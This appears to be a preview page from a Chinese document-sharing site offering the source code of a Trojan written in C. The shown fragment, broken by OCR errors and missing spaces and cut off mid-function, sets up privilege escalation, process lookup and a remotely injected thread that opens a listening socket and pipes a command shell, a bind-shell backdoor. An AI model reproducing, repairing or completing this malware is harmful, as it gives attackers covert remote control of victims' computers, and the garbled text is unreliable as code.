c语言编写的木马程序(源代码附上)

《c语言编写的木马程序(源代码附上)》由会员上传分享，免费在线阅读，更多相关内容在学术论文-天天文库。

1、#include#pragmacomment(lib/,ws2_32.1ibM)#include#include#pragmacomment(lib，MShlwapi.lib”)#include#include#include//参数结构；typedefstruct_RemotePara{DWORDdwLoadLibrary;DWORDdwFreeLibrary;DWORDdwGetProcAddress;DWORDdwGetModule

2、Handle;DWORDdwWSAStartup;DWORDdwSocket;DWORDdwhtons;DWORDdwbind;DWORDdwlisten;DWORDdwaccept;DWORDdwsend;DWORDdwrecv;DWORDdwclosesocket;DWORDdwCreateProcessA;DWORDdwPeekNamedPipe;DWORDdwWriteFile;DWORDdwReadFile;DWORDdwCloseHandle;DWORDdwCreatePipe;DWORDdwTerminateProcess;DWORDdwMessage

3、Box;charstrMessageBoxf12];charwinsockDll[16];charcmd[10];charBuff[4096];chartelnetmsg[60];}RemotePara;//提升应用级调试权限BOOLEnablePrivilege(HANDLEhToken，LPCTSTRszPrivName,BOOLfEnable);//根据进程名称得到进程IDDWORDGetPidByName(char气szName);//远程线程执行体DWORD_stdcallThreadProc(RemotePara*Para){WSADATAWSAData

4、;WORDnVersion;SOCKETlistenSocket;SOCKETclientSocket;structsockaddr_inserver_addr;structsockaddr_inclient_addr;intiAddrSize=sizeof(client_addr);SECURITY_ATTRIBUTESsa;HANDLEhReadPipel;HANDLEhWritePipel;HANDLEhReadPipe2;HANDLEhWritePipe2;STARTUPINFOsi;PROCESS_INFORMATIONProcesslnformation

5、;unsignedlongIBytesRead=0;typedefHINSTANCE(_stdcall*PLoadLibrary)(char*);typedefFARPROC(_stdcall*PGetProcAddress)(HMODULE,LPCSTR);typedefHINSTANCE(_stdcall*PFreeLibrary)(HINSTANCE);typedefHINSTANCE(_stdcall*PGetModuleHandle)(HMODULE);FARPROCPMessageBoxA;FARPROCPWSAStartup;FARPROCPSocke

6、t;FARPROCPhtons;FARPROCPbind;FARPROCPlisten;FARPROCPaccept;FARPROCPsend;FARPROCPrecv;FARPROCFclosesocket;FARPROCPCreateProcessA;FARPROCFPeekNamedPipe;FARPROCPWriteFile;FARPROCPReadFile;FARPROCPCloseHandle;FARPROCPCreatePipe;FARPROCFTerminateProcess;PLoadLibraryLoadLibraryFunc=(PLoadLib

7、rary)Para->dwLoadLibrary;PGetProcAddressGetProcAddressFunc=(PGetProcAddress)Para->dwGetProcAddress;PFreeLibraryFreeLibraryFunc=(PFreeLibrary)Para->dwFreeLibrary;PGetModuleHandleGetModuleHandleFunc=(PGetModuleHandle)Para->dwGetModuleHandle;LoadLibraryFunc(Para->winsockDll);PWSAStartup